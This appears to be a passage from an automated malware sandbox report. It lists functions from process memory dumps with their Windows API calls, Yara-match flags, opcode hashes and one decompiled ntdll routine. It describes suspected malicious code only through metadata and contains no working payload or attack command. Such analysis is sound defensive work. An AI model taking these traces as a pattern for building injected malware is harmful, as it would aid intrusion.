                                                Function 02BB9E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(02BB4D20,?,?,02BB4D20,00000000,FFFFFFFF), ref: 02BB9EB5
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 231ffaeeda2b3ef2d3a159ffa64b92375b1e8e2d7fe79bf11f7637a83fb73f97
                                                • Instruction ID: ea52e998360c7f9f9a05148ab77d7da5f5274edfbe3d2660cb743b051207b973
                                                • Opcode Fuzzy Hash: 231ffaeeda2b3ef2d3a159ffa64b92375b1e8e2d7fe79bf11f7637a83fb73f97
                                                • Instruction Fuzzy Hash: ECE08C39200200AFD710DB94CC85EEB3B29EF48750F154499FAA85B241C170E5008BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BB9E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(02BB4D20,?,?,02BB4D20,00000000,FFFFFFFF), ref: 02BB9EB5
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: a5dc1366db29f63750e556812298ae42d436e7927f4a380265c57f6934bcc96b
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: DDD012756002147BD710EB98CC85EE7775DEF48B50F154495BA585B241C570F50086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4d13eaae18c3b2f41a1e4feeb0557a2ba75af4e37b17b87d9bc5f3355ec84389
                                                • Instruction ID: 136d7c6b509df4ac9e51408bb3a77e10e7054f50e49afdba05c77af2585ba9c9
                                                • Opcode Fuzzy Hash: 4d13eaae18c3b2f41a1e4feeb0557a2ba75af4e37b17b87d9bc5f3355ec84389
                                                • Instruction Fuzzy Hash: 2C90027164104802D100A599541864600059BE1741F51D012A5014955EC7A588917175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 840ca2693a7020c7ecceedbc94daa939161e00b7c5dd451832d4df9a372142ce
                                                • Instruction ID: ee7daf0365fc6ddf8a4425c2884cfa34ed161452f15d34c52af2ca4756f679fd
                                                • Opcode Fuzzy Hash: 840ca2693a7020c7ecceedbc94daa939161e00b7c5dd451832d4df9a372142ce
                                                • Instruction Fuzzy Hash: 4090027175118802D110A159841470600059BD2641F51C412A0814958D87D588917166
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b35a9e1b8504d016bcfa70e48ac08762173dccba83658d834747b5be33e98391
                                                • Instruction ID: a155e99264b07b52ea2f637328c1b7b7d8b7500c96cb048d3f42916e32e779ea
                                                • Opcode Fuzzy Hash: b35a9e1b8504d016bcfa70e48ac08762173dccba83658d834747b5be33e98391
                                                • Instruction Fuzzy Hash: C790026965304402D180B159541860A00059BD2642F91D416A0005958CCB5588696365
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 72270e1671e452d9cb0f467ba744597aea62bdb4e67a63eb8885fd54a1b7486e
                                                • Instruction ID: a0853b32ee4ddd9f5ab68b3ccc281dc48ac4d3fe79d41d716e7e2ddb74ecbe92
                                                • Opcode Fuzzy Hash: 72270e1671e452d9cb0f467ba744597aea62bdb4e67a63eb8885fd54a1b7486e
                                                • Instruction Fuzzy Hash: 7B90026165184442D200A5694C24B0700059BD1743F51C116A0144954CCB5588616565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: aa54fb68b56e85fc8ec246dc7e25e870081efd332ac7cec06ef5915f2dc6cab7
                                                • Instruction ID: d8641f55475f32f89724b4c6316720878387000c18dd44a20aadbc63c26d8b47
                                                • Opcode Fuzzy Hash: aa54fb68b56e85fc8ec246dc7e25e870081efd332ac7cec06ef5915f2dc6cab7
                                                • Instruction Fuzzy Hash: 4E90047174104C43D100F15D4414F470005DFF1741F51C017F0114F54DC755CC517575
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2b9c6e7e4084bb2a36b99b6862adf615a6280648198867fb0acc087a97003f9c
                                                • Instruction ID: 530fd471bdfcf1a0ffa9a50ca152230cab342d25268457e69f728dbe05f1c624
                                                • Opcode Fuzzy Hash: 2b9c6e7e4084bb2a36b99b6862adf615a6280648198867fb0acc087a97003f9c
                                                • Instruction Fuzzy Hash: 219002716410CC02D110A159841474A00059BD1741F55C412A4414A58D87D588917165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0232ac4aef76a642782a331a15a20e408f8a1048c6f15d38c09ae2aea32ffbf8
                                                • Instruction ID: 9b3f41113e64e34bdfcefc871c251839d185439bbf6b8b90c1d426725d171381
                                                • Opcode Fuzzy Hash: 0232ac4aef76a642782a331a15a20e408f8a1048c6f15d38c09ae2aea32ffbf8
                                                • Instruction Fuzzy Hash: 4F900475751044030105F55D07145070047DFD77D1751C033F1005D50CD771CC717175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a5417d2148627800d39c77574b56694e868a846be7f34f20f54996b07a3aa980
                                                • Instruction ID: d51acc8fc75af1e5cb923ea487619dce969d94033b8903936f86a9754bf69897
                                                • Opcode Fuzzy Hash: a5417d2148627800d39c77574b56694e868a846be7f34f20f54996b07a3aa980
                                                • Instruction Fuzzy Hash: EF9002B164104802D140B159441474600059BD1741F51C012A5054954E87998DD576A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cc2918bc0f5347f7b50f0dc446926eddf6b003a8c938ddc1e695c9caa28c81eb
                                                • Instruction ID: 8100e0256ed10c5e95a51be401b2237f0b53cbda89c880e404e7a525f22ff619
                                                • Opcode Fuzzy Hash: cc2918bc0f5347f7b50f0dc446926eddf6b003a8c938ddc1e695c9caa28c81eb
                                                • Instruction Fuzzy Hash: 449002A1642044034105B1594424616400A9BE1641F51C022E1004990DC76588917169
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 378289952d683c381717d555c61274cfc1251ba4cdc916c460194e83712ae380
                                                • Instruction ID: 4a38866ec0043191983f137ed67b504c3f955d0c86086bc8b33d05261cef8a78
                                                • Opcode Fuzzy Hash: 378289952d683c381717d555c61274cfc1251ba4cdc916c460194e83712ae380
                                                • Instruction Fuzzy Hash: 739002A178104842D100A1594424B060005DBE2741F51C016E1054954D8759CC52716A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 20d895b790d5e0cd34d78ce3b1891277615f1e20a8b37ece6bf57be0f23ba4a4
                                                • Instruction ID: c4895c4988a7a9cfabc75c08f0cd102b0db8f041c1c5272335c017733592002d
                                                • Opcode Fuzzy Hash: 20d895b790d5e0cd34d78ce3b1891277615f1e20a8b37ece6bf57be0f23ba4a4
                                                • Instruction Fuzzy Hash: E9900261682085525545F15944145074006ABE1681B91C013A1404D50C87669856E665
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9a20d4d43d1aa121b2af7352ba0346e0b9d590f89d95470f8a7442b627f8912e
                                                • Instruction ID: 5e9214277e6d3b6e8b38bbce017dc051fd4e0b6765bfa37dfcf86b1602533e04
                                                • Opcode Fuzzy Hash: 9a20d4d43d1aa121b2af7352ba0346e0b9d590f89d95470f8a7442b627f8912e
                                                • Instruction Fuzzy Hash: AE90027164104813D111A159451470700099BD1681F91C413A0414958D97968952B165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BBA070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02BA3AF8), ref: 02BBA09D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 6006676d0cb5b30fb1d7cb9dd8798d638d554e943a91bbb4eb3bfcc2b90365d1
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 18E01AB12002086BD714DF59CC44EA777ADEF88750F018554BA4857241C630E9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BA82E8, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02BA834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02BA836B
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: b2e1ccf1cab520e8dba0df0ad2e90310ff53d3651b42f1c39db5f2c11554db28
                                                • Instruction ID: 080b0752b7ae2378fa8dab0c4c7ea3426ef07638b8a6e8c1ad122ab2d022a660
                                                • Opcode Fuzzy Hash: b2e1ccf1cab520e8dba0df0ad2e90310ff53d3651b42f1c39db5f2c11554db28
                                                • Instruction Fuzzy Hash: 8301D431A802287AE721A6949C42FFF776DEF40B55F144199FF04FA1C0E7E46A064AF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BA82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02BA834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02BA836B
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
                                                • Instruction ID: ac63279775f126f04b26bd23213e665562902e6c31aa736845cfafedaad5907c
                                                • Opcode Fuzzy Hash: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
                                                • Instruction Fuzzy Hash: 5701A731A802287BE721A6949C42FFF776CAF40F55F044199FF04BA1C1E6E4790646F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BA82B6, Relevance: 3.0, APIs: 2, Instructions: 49threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02BA834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02BA836B
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: c4663f0b0eca51fbe80b1b10438eb6166ef0282aa58f842af6a482b3d05a18fa
                                                • Instruction ID: f5f50d1953b26f177f63cc0343ab8dffbcc19ae5be47555cfbb54667fb8b5e68
                                                • Opcode Fuzzy Hash: c4663f0b0eca51fbe80b1b10438eb6166ef0282aa58f842af6a482b3d05a18fa
                                                • Instruction Fuzzy Hash: 2001D632A401187EE711AAA4EC52FFA7759EF44B21F0841A9FE049B180E7A5944987E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BAACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02BAAD42
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                • Instruction ID: d68e9204e478d309828d230f1973fcfe4cc555f791ce5c78969913df56333540
                                                • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                • Instruction Fuzzy Hash: DE010CB5D0020DABDB10DAA4DC41FEDB7799F54308F104195A909A7240F671EB58CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BBA0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02BBA134
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 8e0fcf1f07daa360415046a8f4d3af7bc57970c09be24d25ddcc804c6ba62396
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: DD01AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA4DA7240C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BBA1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02BAF1A2,02BAF1A2,?,00000000,?,?), ref: 02BBA200
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: a6597b8abc6d871eba8ab69a3a47709b1d427efaf2df8bf99e98202430e71816
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 61E01AB16002086BDB10DF49CC84EE737ADEF88650F018154BA4867241C930E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BAF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00008003,?,02BA8CF4,?), ref: 02BAF6CB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                • Instruction ID: d8e52fb2d7e748f7e024bba1ccae2ec7e00ffdc80dbf4929306986480ff3b73d
                                                • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                • Instruction Fuzzy Hash: 14D0A7757903043BE610FEA89C13F7732CDAB44B04F4900A4FA48D73C3D950F0018565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 034C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: eb4f438572211ca4169e1932367a18363d0da7c9087f34646684988dfd8af03d
                                                • Instruction ID: 711c368bf00d737010343cda9abacd1f5eef0c495627b3315bad5bc68b3fab09
                                                • Opcode Fuzzy Hash: eb4f438572211ca4169e1932367a18363d0da7c9087f34646684988dfd8af03d
                                                • Instruction Fuzzy Hash: D4B09B71D414C5D5D651D760460871779047BD1741F16C057D1020A55A4778C091F6BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0351FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E0351FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E034CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03515720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03515720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                0x0351fdda
                                                0x0351fde2
                                                0x0351fde5
                                                0x0351fdec
                                                0x0351fdfa
                                                0x0351fdff
                                                0x0351fe0a
                                                0x0351fe0f
                                                0x0351fe17
                                                0x0351fe1e
                                                0x0351fe19
                                                0x0351fe19
                                                0x0351fe19
                                                0x0351fe20
                                                0x0351fe21
                                                0x0351fe22
                                                0x0351fe25
                                                0x0351fe40

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0351FDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0351FE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0351FE2B
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true
                                                • Associated: 00000008.00000002.499332315.000000000357B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.499357651.000000000357F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 09b30c0c17dfb239287fe85c1f4fa32f58819c8b7ed63ca0a9be0c77a28c3bb9
                                                • Instruction ID: 6ce05680975c0c1fee09811266f01f804a8b3dc074a2175715849a54f99c1bce
                                                • Opcode Fuzzy Hash: 09b30c0c17dfb239287fe85c1f4fa32f58819c8b7ed63ca0a9be0c77a28c3bb9
                                                • Instruction Fuzzy Hash: AEF0FC361002017FE6315A45DC06F67BF6BEB85770F240715F6285D5E1E962F87096F4
                                                Uniqueness

                                                Uniqueness Score: -1.00%